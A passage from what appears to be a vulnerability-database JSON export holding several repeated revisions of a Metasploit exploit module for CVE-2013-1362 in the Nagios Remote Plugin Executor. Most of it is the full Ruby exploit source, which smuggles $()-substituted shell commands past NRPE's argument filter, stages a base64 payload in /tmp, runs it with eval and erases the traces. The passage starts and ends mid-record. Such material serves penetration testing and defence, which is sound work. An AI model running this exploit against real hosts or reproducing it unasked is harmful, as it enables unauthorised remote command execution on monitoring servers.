/tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-17T20:29:16", "differentElements": ["modified", "published"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-17T22:29:12", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T22:29:12", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-17T22:29:12", "differentElements": ["modified", "published"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-21T16:35:56", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T22:29:12", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-21T16:35:56", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-21T22:33:47", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-21T22:33:47", "differentElements": ["modified", "published"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-27T16:43:13", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-27T16:43:13", "differentElements": ["modified", "published"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": 